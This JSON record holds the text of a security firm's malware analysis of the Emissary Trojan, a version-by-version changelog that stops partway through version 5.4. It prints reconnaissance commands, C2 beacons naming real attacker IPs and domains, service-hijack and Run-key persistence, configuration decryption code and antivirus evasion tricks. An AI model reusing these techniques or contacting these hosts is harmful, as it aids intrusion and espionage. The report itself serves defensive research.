{
	"id": "25b45f83-b1e6-4d01-bb85-639f82208811",
	"created_at": "2026-04-06T00:18:53.275632Z",
	"updated_at": "2026-04-10T03:34:27.574163Z",
	"deleted_at": null,
	"sha1_hash": "93269fb4566d06a8bc741fe1498cf33c5ce5a9bc",
	"title": "Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 384121,
	"plain_text": "Emissary Trojan Changelog: Did Operation Lotus Blossom Cause\r\nIt to Evolve?\r\nBy Robert Falcone, Jen Miller-Osborn\r\nPublished: 2016-02-03 · Archived: 2026-04-05 18:53:58 UTC\r\nIn December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a\r\npayload. Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which\r\nprompted us to start collecting additional samples of Emissary.\r\nThe oldest sample we found was created in 2009, indicating this tool has been in use for almost seven years. Of\r\nnote, this is three years earlier than the oldest Elise sample we have found, suggesting this group has been active\r\nlonger than previously documented. In addition, Emissary appears to only be used against Taiwanese or Hong\r\nKong based targets, all of the decoys are written in Traditional Chinese, and they use themes related to the\r\ngovernment or military.\r\nWe also found several different versions of Emissary that had several iterative changes that show how the Trojan\r\nevolved over the years. One of the most interesting observations made during this analysis is that the amount of\r\ndevelopment effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom\r\nreport in June 2015, resulting in many new versions of the Emissary Trojan. In addition, we observed a TTP shift\r\npost publication with regards to their malware delivery; they started using compromised but legitimate domains to\r\nserve their malware. Interestingly, the C2 infrastructure is also somewhat different than that used by Elise.\r\nTargeting\r\nIn contrast to Elise, which was used in attacks against multiple Southeast Asian countries in region appropriate\r\nlanguages, all of the Emissary decoys we’ve collected are written in Traditional Chinese, which is used primarily\r\nin Taiwan and Hong Kong. The targets we have identified are also limited to those two regions. 
Despite appearing\r\nto target a more limited geographical range, Emissary targeted the government, higher education, and high tech\r\ncompanies with a mix of copy and pasted news articles and documents that do not appear to be available online.\r\nDecoys include:\r\nAn Excel spreadsheet containing legitimate contact information for much of the Taiwanese government\r\nthat does not appear to be available online.\r\nCopy and paste of a news article where the Deputy Commander of the Nanjing Military region, Wang\r\nHuanguang, responds negatively to a 2014 magazine article from a respected US Taiwan scholar saying the\r\nodds of China and Taiwan reuniting are low and discussing the issues with an attempted military takeover.\r\nCopy of a news article from 2010 about the Chinese League of Victims protesting the involuntary removal\r\nof Shanghai residents in the lead up to the Shanghai Expo.\r\nCopy of the official Taiwan holiday schedule for 2016, which is the 105th anniversary of the current\r\nTaiwanese government.\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 1 of 26\n\nFigure 1: Partial screenshot of the response from Deputy Commander of the Nanjing Military Region Wang\r\nHuangguang.\r\nEvolve to Survive: TTP Shifts and Infrastructure\r\nWe’ve expanded our knowledge of Emissary infrastructure significantly since our first Emissary blog and we’ve\r\nfound almost exclusive use of Dynamic DNS (DDNS) domains with only one purchased from a Chinese reseller.\r\nIn contrast, the Elise samples used a mix of actor-registered and DDNS, with the actor-registered serving as one of\r\nthe data points we used to tie all of the activity together. While the use of DDNS can make tying activity together\r\nmore difficult, and despite the new Emissary variants since our publication, two of the most recent C2s resolved to\r\nIPs used by Elise C2s detailed in Operation Lotus Blossom. 
The Emissary samples typically have three hardcoded\r\nC2s that are a mix of IPs and domain names, with one of the domains or IPs not being used by the other three C2s\r\nin a likely effort to avoid loss of control. A full IOC list is included at the end of this report.\r\nAlso new is the actors’ use of compromised legitimate Taiwanese websites to serve their malware, including the\r\nofficial website of the Democratic Progressive Party. This is particularly interesting as Taiwan just held a closely\r\nwatched Presidential election on 16 January where DPP candidate Tsai Ing-wen won. This marked the first time a\r\nwoman was elected President of Taiwan and only the second time a member of the Kuomintang did not hold the\r\noffice since being ousted from China in 1949 when the Communist Party of China took power. In line with her\r\nparty’s stance, she is widely seen as a proponent of an independent Taiwan and not in favor of reunification with\r\nthe People’s Republic of China.\r\nMalware Updates\r\nOur evidence suggests that malware authors created Emissary as early as 2009, which suggests that threat actors\r\nhave relied on this tool as a payload in cyber-espionage attacks for many years. The Emissary Trojan is a capable\r\ntool to gain a foothold on a targeted system. While it lacks more advanced functionality like screen capturing, it is\r\nstill able to carry out most tasks desired by threat actors: exfiltration of files, ability to download and execute\r\nadditional payloads, and gain remote shell access. It appears that threat actors have continually used this Trojan,\r\nand developed several updated versions of Emissary to remain undetected and fresh over time.\r\nWe analyzed all of the known Emissary samples to determine what changes the malware author made between the\r\ndifferent versions of the Trojan. 
During our analysis, we examined when each sample was created based on its\r\ncompile time and produced a simple timeline, seen in Figure 2, to display the development efforts expended on the\r\nEmissary Trojan. It should be noted that we know some Emissary samples have been used multiple times with\r\ndifferent configurations, so the timeline only shows when development activity took place on Emissary and should\r\nnot be misconstrued as indicating when Emissary was used in attacks.\r\nThe timeline in Figure 2 shows that the Emissary Trojan was first created (version 1.0) in May 2009 and quickly\r\nreceived an update that resulted in version 1.1 in June 2009. The Trojan did not receive much in the form of\r\nupdates until September 2011 when the author released version 2.0. Version 2.0 received one update in October\r\n2013 before the malware author released version 3.0 in December 2014. The malware author released version 4.0\r\nin March 2015, but curiously created a version 3.0 sample afterwards on June 26, 2015, which was out-of-sequence from the incrementing versioning. 
Between August and November 2015 the malware author created\r\nseveral new versions of Emissary, specifically 5.0, 5.1, 5.3 and 5.4, in much more rapid succession compared to\r\nthe development process in earlier versions.\r\nFigure 2: Timeline of development efforts spent on Emissary\r\nThe out-of-sequence version 3.0 appears to be an early variant of version 5.0 based on significant similarities\r\n(discussed in the changelog section) that are not seen in the original version 3.0 and other earlier versions of\r\nEmissary. One campaign code associated with the out-of-sequence version 3.0 sample was “3test”, suggesting\r\nthe malware author created it for testing purposes. The other campaign code associated with the out-of-sequence\r\nsample was “IC00001”, which could denote an attack payload as it appears to be a plausible code to describe a\r\ncampaign.\r\nWhile this may be coincidental, the out-of-sequence version 3.0 sample was created ten days after we published\r\nthe Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary. It is possible\r\nthat the threat actors were prompted to make malware changes in response to our research. 
Regardless of\r\ncausation, the rapid development of new versions of Emissary suggests that the malware authors are making\r\nfrequent modifications to evade detection, which as a corollary suggests the threat actors are actively using the\r\nEmissary Trojan as a payload in attacks.\r\nEmissary Changelog\r\nIn this section, we discuss the changes observed between each version of Emissary. As this section is focused on\r\nchanges, the features and functionality are the same between Emissary versions unless otherwise mentioned.\r\nVersion 1.0\r\nDate: 5/12/2009\r\nSHA256: a7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484\r\nOriginal Name: WUMsvc.dll\r\nInitial Release\r\nThe initial loader Trojan writes Emissary to %SYSTEM%\\WSPsvc.dll and installs it as a service, which will run\r\nthe exported function \"ServiceMain\" within the Emissary Trojan to carry out its functionality.\r\nConfiguration data is stored in the last 1024 bytes of the payload, from which the Trojan will extract an 896 byte\r\nstructure. The configuration is decrypted with an algorithm that uses the XOR operation on each byte using the\r\nvalue at a different offset within the ciphertext.\r\nThe code will create the following registry keys:\r\nHKEY_CLASSES_ROOT\\Shell.LocalServer\\CheckCode\r\nHKEY_CLASSES_ROOT\\Shell.LocalServer\\CheckID\r\nEmissary uses the \"CheckCode\" registry key to store the encrypted configuration for the Trojan, while it stores a\r\nGUID that Emissary uses to uniquely identify the compromised host in the \"CheckID\" key.\r\nThe malware performs initial system information gathering and saves data to a file named TMP2548. 
The initial\r\ngathering relies on a combination of the following commands executed by the command prompt:\r\nECHO VER\r\nVER\r\nECHO IPCONFIG /ALL\r\nIPCONFIG /ALL\r\nECHO NET LOCALGROUP ADMINISTRATORS\r\nNET LOCALGROUP ADMINISTRATORS\r\nECHO NET START\r\nNET START\r\nECHO GPRESULT /Z\r\nGPRESULT /Z\r\nECHO GPRESULT /SCOPE COMPUTER /Z\r\nGPRESULT /SCOPE COMPUTER /Z\r\nECHO SYSTEMINFO\r\nSYSTEMINFO\r\nEmissary parses command and control responses for \"instru\", which will precede a GUID value that designates\r\nthe command the C2 server wishes to execute on the system. The command handler does not use a nested if/else\r\nor switch statement like most malware families; instead, Emissary creates a structure that contains all of the\r\navailable command GUIDs that it will iterate through each time the C2 supplies a GUID in order to determine\r\nwhich command the operator wishes to execute. Emissary can include up to 32 different commands within this\r\ndata structure, but it appears the author has decided to include six commands within the Trojan. 
The following\r\ndenotes the command handler structure used by Emissary v1.0:\r\nstruct EMISSARY_COMMAND\r\n{\r\n  CHAR guid[40];\r\n  DWORD sub_function;\r\n  DWORD arg1_subfunction;\r\n  DWORD arg2_subfunction;\r\n  DWORD arg3_subfunction;\r\n};\r\nstruct commandHandler\r\n{\r\n  DWORD number_of_commands;\r\n  DWORD unused;\r\n  struct EMISSARY_COMMAND cmd_0;\r\n  struct EMISSARY_COMMAND cmd_1;\r\n  struct EMISSARY_COMMAND cmd_2;\r\n  struct EMISSARY_COMMAND cmd_3;\r\n  struct EMISSARY_COMMAND cmd_4;\r\n  struct EMISSARY_COMMAND cmd_5;\r\n};\r\nTable 1 contains the commands available within the Emissary v1.0 command handler.\r\nCommand - Description\r\nbac84b12-5b0b-491f-a885-8667d156394f - Upload file.\r\n3d8313cc-53ca-4751-bbbf-ea5f914f8e65 - Download file.\r\ndb0e93e7-b46c-4cba-81f1-ec70da57dc19 - Update config. 
C2 specifies fields as: p1 = C2 server 1, p2 = C2 server 2, p3 = C2\r\nserver 3, p4 = Sleep Interval, p5 = System Identifier (computer name), p6 =\r\nGUID for beacon.\r\n2e382e51-3089-4293-8454-5eccb253eb54 - Executes a specified command.\r\na57db08a-bf97-4b43-b27d-157e62e2fd74 - Create remote shell.\r\neab5c1ab-a497-4fc2-bbe0-049be45d6f2d - Update Trojan with new executable.\r\nTable 1: Emissary command handler\r\nThe Emissary version 1.0 beacon to the C2 server appears as follows:\r\nGET /VSNET/default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\nHost: 193.34.144[.]21\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nDate: 5/31/2009\r\nSHA256: e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30\r\nOriginal Name: WUMsvc.dll\r\nRemoved checks for \"//\" and \"/\" in the update configuration command when updating the three C2 servers.\r\nVersion 1.1\r\nDate: 6/5/2009\r\nSHA256: 931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb\r\nOriginal Name: WUMsvc.dll\r\nBug fixes:\r\nAdded code to make sure the content received from the C2 server matches the \"Content-Length\" value in\r\nthe HTTP response.\r\nCode added to allow for the download of more than 524,288 bytes.\r\nThe Emissary v1.1 C2 beacon appears as follows, which has not changed since version 1.0:\r\nGET /eng/comfunc/comfunc/default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\nHost: 137.189.145.1\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nVersion 2.0\r\nDate: 9/15/2011\r\nSHA256: 5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099\r\nOriginal Name: EmissaryDll.dll\r\nVersion 2.0 was a significant re-write of the Emissary Trojan.\r\nThe configuration data for the Trojan is still saved to the registry, but the registry 
key has changed to:\r\nSOFTWARE\\Microsoft\\VBA\\VbaData\r\nThe configuration structure also changed in size to 464 bytes. The Emissary configuration is now encrypted using\r\na custom algorithm that uses the \"srand\" function to seed the \"rand\" function using a value of 2563. This seed\r\nvalue causes the \"rand\" function to generate the same values each time, which Emissary will use as a key along\r\nwith the XOR operation. The configuration now contains the version number of Emissary, instead of the version\r\nbeing hardcoded into the Trojan.\r\nThis version of Emissary keeps track of which C2 location within its configuration it has been communicating\r\nwith by storing the index of the C2 server (1, 2, or 3) in the following registry key:\r\nSOFTWARE\\Microsoft\\VBA\\VbaList\r\nThis version of Emissary moves away from the command handler using the structure and moves to a nested if/else\r\nstatement for less complicated command handling; however, the command GUIDs and commands themselves are\r\nunchanged.\r\nThe Emissary version 2.0 beacon changed slightly from previous versions, specifically the removal of the User-Agent field and the use of a lowercase \"h\" in the \"Host\" field. The following is an example of the version 2.0\r\nbeacon, which contains the same GUID and \"op\" values:\r\nGET /0test/test/default.aspx HTTP/1.1\r\nhost: 163.20.127.27\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6;\r\nVersion 2.0 also introduces a debug message logging system that includes verbose error messages that are\r\naccompanied by an error ID number. Error messages are written to the file %TEMP%\\em.log. 
The following is a\r\nlist of all possible debug messages:\r\nSource - Error ID - Debug Message\r\nemissarydll.cpp - 0x30 - InitApp() - Event already exists\r\nemissarydll.cpp - 0x35 - InitApp() - Event create successful\r\nemissarydll.cpp - 0x3b - InitApp() - create work thread\r\nshell.cpp - 0x30 - SendShellOutputThread - PeekNamedPipe - Error : 0x%08x\r\nshell.cpp - 0x3e - SendShellOutputThread() : Timeout\r\nshell.cpp - 0x53 - SendShellOutputThread - ReadFile - Error : 0x%08x\r\nshell.cpp - 0x5b - SendShellOutputThread - send - Error : 0x%08x\r\nshell.cpp - 0x62 - SendShellOutputThread() : thread exit\r\nshell.cpp - 0x7f - RecvShellCmdThread - recv - Error : 0x%08x\r\nshell.cpp - 0x89 - RecvShellCmdThread - WriteFile - Error : 0x%08x\r\nshell.cpp - 0x8f - RecvShellCmdThread() : thread exit\r\nshell.cpp - 0xeb - Error occured : %s [%d]\r\nshell.cpp - 0xfa - TerminateThread Input Thread\r\nshell.cpp - 0x100 - TerminateThread Output Thread\r\nshell.cpp - 0x118 - SocketShell - Fail To Create Reverse Socket\r\nshell.cpp - 0x12f - SocketShell - Fail To  Generate Reverse Shell\r\nshell.cpp - 0x13a - SocketShell - SocketShell - Fail To  Generate Reverse Shell\r\nshell.cpp - 0x13e - SocketShell - Create Reverse Shell Thread OK\r\nconfig.cpp - 0x38 - RegCreateKeyEx error : %0x08x\r\nconfig.cpp - 0x46 - RegSetValueEx error : %0x08x\r\nconfig.cpp - 0x5e - ReadConfig - RegCreateKeyEx error : 0x%08x\r\nconfig.cpp - 0x66 - ReadConfig - RegQueryValueEx error : 0x%08x\r\nconfig.cpp - 0xab - find user: %s\r\nconfig.cpp - 0xbc - can not find proxy\r\nconfig.cpp - 0xc7 - get ProxySetting 
failed\r\nconfig.cpp - 0xd4 - find proxy server : %s\r\nrun.cpp - 0x75 - InitConfig: [g_ServerPath:%s] [g_ServerName:%s] [g_port:%d] [g_ServerUrl:%s]\r\nrun.cpp - 0x9d - InitConfig: [g_DelayTime:%d]\r\nrun.cpp - 0xbe - get proxy the last time used:%s\r\nrun.cpp - 0xc3 - server index:%d\r\nrun.cpp - 0xd9 - RetryTimes = %d\r\nrun.cpp - 0xec - connect %s error :%s\r\nrun.cpp - 0x10c - process a request ok.\r\nhttpclient.cpp - 0x98 - ASP.NET_SessionId长度异常:[%d][%s] (translation: ASP.NET_SessionId\r\nLength Exception:[%d][%s])\r\nhttpclient.cpp - 0xd0 - ******not connected !\r\nhttpclient.cpp - 0xf4 - read hread error : %s\r\nhttpclient.cpp - 0x102 - body length = 0\r\nhttpclient.cpp - 0x13d - decrypt error\"\r\nhttpclient.cpp - 0x211 - instruction : \u003cinstruction\u003e\r\nhttpclient.cpp - 0x21d - no instruction guid\r\nhttpclient.cpp - 0x22c - OP_DOWNLOAD no local file name\r\nhttpclient.cpp - 0x23b - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x249 - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x242 - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x25b - OP_EXECUTE no cmd list\r\nhttpclient.cpp - 0x262 - OP_EXECUTE no timeout\r\nhttpclient.cpp - 0x2b4 - OP_SHELL ip\r\nhttpclient.cpp - 0x2bb - OP_SHELL port\r\nhttpclient.cpp - 0x2dd - OP_CHANGECONFIG server1\r\nhttpclient.cpp - 0x2e4 - OP_CHANGECONFIG server2\r\nhttpclient.cpp - 0x2eb - OP_CHANGECONFIG server3\r\nhttpclient.cpp - 0x2f2 - OP_CHANGECONFIG timestr\r\nhttpclient.cpp - 0x2f9 - OP_CHANGECONFIG namestr\r\nhttpclient.cpp - 0x300 - OP_CHANGECONFIG guid\r\nhttpclient.cpp - 0x321 - not connected\r\nhttpclient.cpp - 0x361 - send msg error\r\nhttpdoinstruction.cpp - 0x28 - DownloadFile - 
LocalFileName=%s\r\nhttpdoinstruction.cpp - 0x5c - download file http head:%s\r\nhttpdoinstruction.cpp - 0x7a - download file ok\r\nhttpdoinstruction.cpp - 0xac - UploadFile - LocalFileName=%s\r\nhttpdoinstruction.cpp - 0xb4 - DownloadFile - Error - Open File [%S][0x%08x]\r\nhttpdoinstruction.cpp - 0xc7 - UploadFile:TotalLength=%d\r\nhttpdoinstruction.cpp - 0x124 - download file http head:%s\r\nDate: 10/24/2013\r\nSHA256: 9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3\r\nOriginal Name: NetPigeon_DLL.dll\r\nThis update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the\r\nEmissary service, which the Trojan will store in and access from the following registry keys:\r\nSOFTWARE\\Microsoft\\VBA\\Serv -\u003e Service Name\r\nSOFTWARE\\Microsoft\\VBA\\VbaList -\u003e Binary Path for the Service\r\nAlso, this version of Emissary was created using Microsoft Foundation Classes (MFC) to carry out a majority of\r\nits functionality. For instance, instead of manually building an HTTP request as in previous versions, this version\r\nuses the MFC functions to create the HTTP request and send it to the C2 server:\r\nCInternetSession::CInternetSession\r\nCInternetSession::GetHttpConnection\r\nCHttpConnection::OpenRequest\r\nCHttpFile::AddRequestHeaders\r\nCInternetSession::SetCookie\r\nCHttpFile::SendRequest\r\nUsing these classes creates a significantly different HTTP request sent to the C2 server, but the functionality of\r\nobtaining instructions from the C2 is the same. 
The following is an example of a beacon generated by this sample,\r\nwhich contains the same \"op\" value and has additional fields within the HTTP header:\r\nGET /lightserver/Default.aspx HTTP/1.0\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: groupspace.findhere.org\r\nCookie: guid=8E550BBD-F5DB-4471-BBC7-E8768BD5003E; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nThe logging functionality within this update no longer includes error ID values, but still contains verbose debug\r\nmessages that are written to a file named %TEMP%\\msmqinst.ax.\r\nVersion 3.0\r\nDate: 12/24/2014\r\nSHA256: dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3\r\nOriginal Name: Generic.dll\r\nBug fixes:\r\nAdded a function to the configuration update command that checks to see if the C2 provided a new sleep\r\ninterval at offset 460 and uses the interval stored in the VbaData registry key if it is missing. This fixes the\r\nbug that would not allow the sleep interval to update correctly.\r\nVersion 4.0\r\nDate: 3/26/2015\r\nSHA256: 5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58\r\nOriginal Name: Generic.dll\r\nThis version of Emissary includes both the installation and loading functionality along with the Emissary\r\nfunctional code in the same file. The installation and loading portion of the Trojan is called using an exported\r\nfunction named \"Setting\", which moves the file to:\r\nThe loading portion of this version of Emissary checks the permissions of the current user and either installs\r\nEmissary as a service or as a standalone Trojan. 
To install as a service, the loader will enumerate the services on\r\nthe system looking for services running under the \"netsvcs\" group, and it will attempt to hijack the first \"netsvcs\"\r\nservice by replacing the \"ServiceDLL\" parameter to point to the Emissary DLL. For instance, during the analysis\r\nperiod, the installation code changed the following registry key of the AppMgmt service:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt\\Parameters\\ServiceDll:\r\n\"%SystemRoot%\\System32\\appmgmts.dll\"\r\nto\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt\\Parameters\\ServiceDll:\r\n\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Remdisk.dll\"\r\nIf the user does not have permissions to add a service, the installation routine attempts to add persistence by\r\ncreating the following registry key that will run the functional code within Emissary via an exported function\r\nnamed \"DllRegister\":\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\\Resolves: \"Rundll32.exe\r\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Remdisk.dll,DllRegister\"\r\nThis version of Emissary has its configuration appended to the end of the DLL, specifically starting at offset\r\n0xc600. The following code accesses the configuration embedded within the DLL and decrypts it using a single\r\nbyte XOR algorithm using 65 as the key:\r\nSetFilePointer(h_emissary_dll_file, 0xC600, 0, 0);\r\nReadFile(h_emissary_dll_file, buffer_for_config, 0x1D0u, \u0026NumberOfBytesRead, 0);\r\niteration_count = 0;\r\ndo\r\n  *(iteration_count++ + buffer_for_config) += 65;\r\nwhile ( iteration_count \u003c 0x1D0 );\r\nThis algorithm differs from the algorithm introduced in Emissary version 2.0 that used the srand and rand\r\nfunctions to generate a key to use in conjunction with the XOR operation. 
With the configuration embedded\r\nwithin the Emissary DLL, each Emissary version 4.0 sample will have a different hash as the configuration data\r\nchanges.\r\nThe network beacon sent from Emissary version 4.0 is the same as other previous versions starting at version 2.0,\r\nas seen in the following:\r\nGET /lightserver/Default.aspx HTTP/1.0\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: 210.209.121.92\r\nCookie: guid=7DA53AE4-C155-40b3-8EB3-60C4FCE99025; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nVersion 3.0: Out-of-sequence\r\nDate: 6/25/2015\r\nSHA256: 70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a\r\nOriginal Name: IISDLL.dll\r\nMajor Overhaul\r\nThe compilation time of one sample of Emissary version 3.0 on June 25, 2015 appears out of order, as it occurs\r\nafter the compilation of Emissary version 4.0. The differences between this out of order sample compared to the\r\nother known version 3.0 sample, as well as version 4.0 for that matter, include a dramatic change in configuration\r\nstorage and the handling of commands. Also, the files stored on the system have different names than Emissary\r\nversions in the past, which are:\r\n%TEMP%\\000IISA758C8FEAE5F.TMP -\u003e Log file\r\n%APPDATA%\\LocalData\\75BD50EC.DAT -\u003e Configuration file\r\n%APPDATA%\\LocalData\\A08E81B411.DAT -\u003e Emissary DLL\r\nThis version of Emissary is designed to be injected into an Internet Explorer process by its associated loader\r\nTrojan, which marks the first time Emissary executes through DLL injection.\r\nThis version of Emissary also has a different configuration structure than prior versions. The configuration is no\r\nlonger stored in the registry; rather it is saved to a file named 75BD50EC.DAT. 
The Emissary DLL will skip to\r\noffset 0x488 within this file and read the next 132 bytes, which it will decrypt with a new algorithm as seen in the\r\nfollowing:\r\nSetFilePointer(h_config_file, 0x488, 0, 0);\r\nReadFile(h_config_file, buffer_for_config, 132u, \u0026NumberOfBytesRead, 0);\r\nCloseHandle(h_config_file);\r\nsrand(0xA03u);\r\niteration_count = 0;\r\ndo\r\n  *(buffer_for_config + iteration_count++) ^= rand() % 128;\r\nwhile ( iteration_count \u003c 0x84 );\r\nThe configuration structure has also changed, with Emissary now using the following structure:\r\nstruct emissary_new_config {\r\nWORD Emissary_version_major;\r\nWORD Emissary_version_minor;\r\nCHAR[36] GUID_for_sample;\r\nWORD Unknown1;\r\nCHAR[128] Server1;\r\nCHAR[128] Server2;\r\nCHAR[128] Server3;\r\nCHAR[128] CampaignName;\r\nCHAR[550] Unknown2;\r\nWORD Delay_interval_seconds;\r\n};\r\nThis version of Emissary also introduced a new command handler that uses number-based commands instead of\r\nthe GUID commands seen in prior versions of Emissary. The functionality of the commands is the same;\r\nhowever, the commands themselves are invoked using a number. Table 2 contains a list of available commands\r\nand a brief description of the functionality carried out by the command.\r\nCommand - Description\r\n102 - Upload a file to the C2 server.\r\n103 - Executes a specified command.\r\n104 - Download file from the C2 server.\r\n105 - Update configuration file.\r\n106 - Create a remote shell.\r\n107 - Updates the Trojan with a new executable.\r\nTable 2: New Emissary command handler\r\nThe network beacon sent from this version of Emissary is very similar to the beacon first introduced in Emissary\r\nversion 2.0; however, the \"op\" value of \"101\" is hardcoded for the beacon and replaces the GUID based op\r\ndesignator to match the new command handler. 
The following is an example of the network beacon generated by\r\nthis version of Emissary:\r\nGET /default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: 101.55.33.92\r\nCache-Control: no-cache\r\nCookie: guid=cae5e213-395a-4023-9a12-f78d3c4718e5; op=101\nVersion 5.0\nDate: 8/25/2015\nSHA256: c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634\nOriginal Name: WinDLL.dll\nEmissary version 5.0 closely resembles the out-of-order version 3.0 sample, which suggests that the malware\nauthor just forgot to change the version number of the out of order sample. While the configuration and Emissary\nDLL filenames used by the version 5.0 Emissary sample are the same as the out-of-order version 3.0 sample, the\nlog file name differs but only slightly, as seen in the following list of related files:\n%TEMP%\\000A758C8FEAE5F.TMP -\u003e Log File\n%APPDATA%\\LocalData\\75BD50EC.DAT -\u003e Configuration file\n%APPDATA%\\LocalData\\A08E81B411.DAT -\u003e Emissary DLL\n%APPDATA%\\LocalData\\ishelp.dll -\u003e Loader DLL\nVersion 5.0 uses numbers within its command handler and the same configuration structure as the out-of-order\nversion 3.0. The only major change in 5.0 is the ability to obtain a compromised system's external IP address by\nperforming an HTTP GET request to \"http://showip.net/index.php\". The code will parse the response from this\nwebserver for the following to obtain the system's IP address:\nThe SID value sent from the C2 server is encrypted using an algorithm that uses the XOR operation on the data\nusing 0x76 as the key on the first byte and the resulting cleartext byte as the key on the next byte and so on. 
The\nnetwork beacon sent from this version of Emissary visually resembles the out-of-order version, with the addition\nof a field \"SHO\" that contains the IP address of the compromised host. The following is an example of the\nEmissary version 5.0 network beacon, which is the same in versions 5.1, 5.3 and 5.4:\nGET /default.aspx HTTP/1.1\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\nHost: 101.55.33.95\nCache-Control: no-cache\nCookie: guid=8cdef38c-808a-4e29-af6e-7386f02d28f1; op=101; SHO=172.16.107.130\r\nVersion 5.1\r\nDate: 9/29/2015\r\nSHA256: 375190cc8e0e75cf771d66347ea2a04b6d1b59bf2f56823eb81270618f133e2d\r\nOriginal Name: WinDLL.dll\r\nFor version 5.1 the malware author took out the exception handling in the Upload File command and obfuscated\r\ntwo strings within the Trojan to avoid detection. The strings exist in the Trojan in encrypted form and are\r\ndecrypted using an algorithm that adds 65 (\"A\") to each byte of ciphertext. 
The obfuscated\r\nstrings, as seen below, involve the filename of the log file and the command prompt executable used to create the\r\nremote shell:\r\n\\xEF\\xEF\\xEF\\x00\\xF6\\xF4\\xF7\\x02\\xF7\\x05\\x04\\x00\\x04\\xF4\\x05\\xED\\x13\\x0C\\x0F =\r\n000A758C8FEAE5F.TMP\r\n\\x22\\x2C\\x23\\xED\\x24\\x37\\x24 = cmd.exe\r\nDate: 10/14/2015\r\nSHA256: e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538\r\nOriginal Name: WinDLL.dll\r\nIn an attempt to avoid detection based on PE header hashes, version 5.1 was recompiled without making any\r\nchanges.\r\nVersion 5.3\r\nDate: 11/7/2015\r\nSHA256: 29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051\r\nOriginal Name: WinDLL.dll\r\nEmissary 5.3 moved some of the code used to create the remote shell out of a subfunction in an attempt to evade\r\nsignatures used to detect the remote shell creation. For instance, in Emissary 5.1 the command handler would call\r\nan initial subfunction that would then call a second subfunction to carry out the activities to create and interact\r\nwith the remote shell. In 5.3, the command handler calls an initial subfunction that carries out the activities to\r\ncreate and interact with the remote shell.\r\nVersion 5.4\r\nDate: 11/23/2015\r\nSHA256: 69b1d5454abe2475257defd9962a24a92411212c4f592de8765369a97f26c037 (Base DLL with junk data\r\nremoved)\r\nOriginal Name: WinDLL.dll\r\nVersion 5.4 of Emissary was the basis for the blog “ELISE: Security Through Obesity” by Michael Yip of PwC.\r\nThis blog provides a great analysis of this version of Emissary and we highly suggest reading it to become\r\nfamiliar with the Trojan.\r\nThere is one difference in the functional code between Emissary versions 5.3 and 5.4, which involves the removal\r\nof the command '107' used to update the Trojan. 
The string '107' still exists within the Trojan; however, the\r\ncommand handler does not check the C2 response for this command and the code used to update the Trojan has\r\nbeen removed.\r\nThe major difference between Emissary version 5.4 and all previous versions is how the Trojan is saved and\r\nloaded. First, the filenames of the various components of Emissary changed to the following; however, the\r\nfilename for debug logs has not changed:\r\n%APPDATA%\\Programs\\Syncmgr.dll -\u003e Loader Trojan\r\n%APPDATA%\\Programs\\60HGBC00.DAT -\u003e Configuration File\r\n%APPDATA%\\Programs\\WEB2013BW6.DAT -\u003e Emissary Trojan\r\n%TEMP%\\000A758C8FEAE5F.TMP -\u003e Log file\r\nIn addition to the file name changes, the biggest (pardon the pun) change involves the Loader Trojan (Syncmgr.dll)\r\nappending junk data to the end of the Emissary DLL file to make incredibly large files. The reason for creating\r\nsuch large files is to trick antivirus applications into not scanning the file, as it could exceed the maximum size of\r\nfiles the antivirus can scan (even VirusTotal has a maximum file size of 128MB). 
